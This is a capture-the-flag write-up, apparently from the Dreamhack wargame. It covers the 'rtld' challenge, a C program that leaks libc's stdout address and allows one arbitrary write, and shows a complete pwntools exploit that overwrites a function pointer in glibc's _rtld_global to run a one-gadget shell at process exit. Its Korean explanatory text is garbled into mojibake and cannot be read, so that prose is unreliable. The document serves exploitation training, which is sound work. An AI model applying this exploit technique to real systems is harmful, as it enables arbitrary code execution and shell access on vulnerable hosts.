
๋ฌธ์ ์ฝ๋๋ ๋ค์๊ณผ ๊ฐ๋ค.
// gcc -o rtld rtld.c -fPIC -pie
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <dlfcn.h>
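/*
 * SIGALRM handler installed by initialize(): prints a timeout notice and
 * terminates the process with status -1 (the parent observes 255).
 *
 * @param sig  signal number supplied by the kernel; unused.
 *
 * The parameter is declared explicitly so the definition matches the
 * void (*)(int) type that signal() expects, rather than relying on an
 * unprototyped "()" declarator.  Note that puts() and exit() are not
 * async-signal-safe; a handler that must be safe under any interruption
 * point would use write() and _exit().  They are kept here so the
 * challenge binary's observable behaviour is unchanged.
 */
void alarm_handler(int sig) {
    (void)sig;
    puts("TIME OUT");
    exit(-1);
}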
/*
 * One-time process setup called at the start of main(): switch stdin and
 * stdout to unbuffered mode so prompts and replies are not held in stdio
 * buffers, then arm a 60-second SIGALRM watchdog served by alarm_handler().
 */
void initialize(void) {
    FILE *unbuffered[] = { stdin, stdout };
    for (size_t i = 0; i < sizeof unbuffered / sizeof unbuffered[0]; i++) {
        setvbuf(unbuffered[i], NULL, _IONBF, 0);
    }
    signal(SIGALRM, alarm_handler);
    alarm(60);
}
/*
 * Spawns /bin/sh through system().  Nothing in this listing calls it —
 * main() only calls initialize() — so it is merely present in the binary.
 */
void get_shell(void) {
    static const char shell_cmd[] = "/bin/sh";
    (void)system(shell_cmd);
}
/*
 * Challenge entry point.  After initialize(), it prints the address of the
 * libc `stdout` FILE object (the exploit below derives the libc base from
 * it), then reads an address and a value and performs one unchecked
 * sizeof(long)-byte store: *(long *)addr = value.  addr is never validated,
 * so any writable mapping can be modified — an arbitrary-write primitive.
 * Returning from main() is equivalent to calling exit(), whose teardown
 * path is what the writeup targets.
 */
int main()
{
long addr;
long value;
initialize();
/* %p of a libc-resident object: leaks where libc is mapped. */
printf("stdout: %p\n", stdout);
printf("addr: ");
scanf("%ld", &addr);   /* return value ignored: addr may stay uninitialized on bad input */
printf("value: ");
scanf("%ld", &value);  /* same: value unchecked */
/* Attacker-chosen destination and contents; no bounds or mapping check. */
*(long *)addr = value;
return 0;
}
๋ณดํธ ๊ธฐ๋ฒ์ ๋จผ์ ํ์ธํด์ฃผ์๋ค.
Partial RELRO์ด๋ฏ๋ก GOT overwrite์ด ๊ฐ๋ฅํ๋ค.
์ฝ๋ ๋ถ์
/*
 * Code-analysis copy of main(): the only interesting behaviour is the leak
 * of the libc `stdout` address followed by a single attacker-controlled
 * store of a long to an attacker-controlled address.  Because neither
 * input is validated, the write may land in any writable region; the
 * process then exits normally, running its teardown path.
 */
int main()
{
long addr;
long value;
initialize();
/* Leak: address of libc's stdout object. */
printf("stdout: %p\n", stdout);
printf("addr: ");
scanf("%ld", &addr);
printf("value: ");
scanf("%ld", &value);
/* One write-what-where with no check on addr. */
*(long *)addr = value;
return 0;
}
mainํจ์๋ฅผ ์ดํด๋ณด๋ฉด stdout ๋ผ์ด๋ธ๋ฌ๋ฆฌ ์ฃผ์๋ฅผ ์ถ๋ ฅํ๋ ๊ฑธ ํ์ธํ ์ ์๋ค.
_rtld_global_dl_rtld_lock_recursive์ oneshot gadget์ ์ฃผ์๋ก ๋ฎ์ผ๋ฉด ์์ ํ๋ํ ์ ์๋ค.
_rtld_global_dl_rtld_lock_recursive : ํจ์ ์ฃผ์
_rtld_global_dl_rtld_lock : ํจ์ ์ธ์
_rtld_global_lock_recursive์ ์๋ Libc ์ฃผ์๋ฅผ one gadget์ผ๋ก ๋ฎ์ผ๋ฉด exit ๋ ๋ one gadget์ ์คํํ ์ ์๋ค.
__GI_exit ํจ์๋ _run_exit_handlers๋ฅผ ํธ์ถํ๋๋ฐ, _run_exit_handlers๋ ld.so์ ์กด์ฌํ๋ _dl_fini๋ฅผ ํธ์ถํ๋ค.
_dl_fini
void
_dl_fini (void)
{
#ifdef SHARED
int do_audit = 0;
again:
#endif
for (Lmid_t ns = GL(dl_nns) - 1; ns >= 0; --ns)
{
/* Protect against concurrent loads and unloads. */
__rtld_lock_lock_recursive (GL(dl_load_lock));
_dl_fini ํจ์๋ _rtld_lock_lock_recursive ํจ์๋ฅผ ํธ์ถํ๋ค.
์ด ํจ์์ ์ธ์๋ _rtld_global ๊ตฌ์กฐ์ฒด์ ๋ฉค๋ฒ์ด๋ค.
_rtld_global ๊ตฌ์กฐ์ฒด๊ฐ ์์นํ ์์ญ์ ์ฐ๊ธฐ ๊ถํ์ด ์์ด์ _rtld_lock_lock_recursive ํจ์๋ฅผ system์ผ๋ก, _dl_load_lock์ธ์๋ฅผ 'sh'๋ก ๋ฎ์ด์ธ ์ ์์ผ๋ฉด system('sh') ํธ์ถ์ด ๊ฐ๋ฅํ๋ค.
์ต์คํ๋ก์ ์ฝ๋
# pwntools PoC from the writeup: read the leaked stdout address, derive the
# libc base from a build-specific offset, then spend main()'s single write
# on a function pointer inside _rtld_global so the one-gadget runs during
# process exit (see the analysis above).
from pwn import *
p = remote('host3.dreamhack.games', 12058)
# All three offsets are tied to the remote target's particular glibc/ld.so
# build; on any other build they differ and must be re-derived.
stdout_offset = 0x3c5620
oneshot_offset = 0xf1147
rtld_global_offset = 0x5f0040
p.recvuntil('stdout: 0x')
stdout = int(p.recvline()[:-1], 16)
libc = stdout - stdout_offset # libc base
oneshot = libc + oneshot_offset # oneshot gadget
rtld_global = libc + rtld_global_offset
# 3848 is presumably the offset of the _dl_rtld_lock_recursive member within
# _rtld_global for this build (per the writeup) — also build-specific.
p.sendlineafter('addr: ', str(rtld_global + 3848))
p.sendlineafter('value: ', str(oneshot))
p.interactive()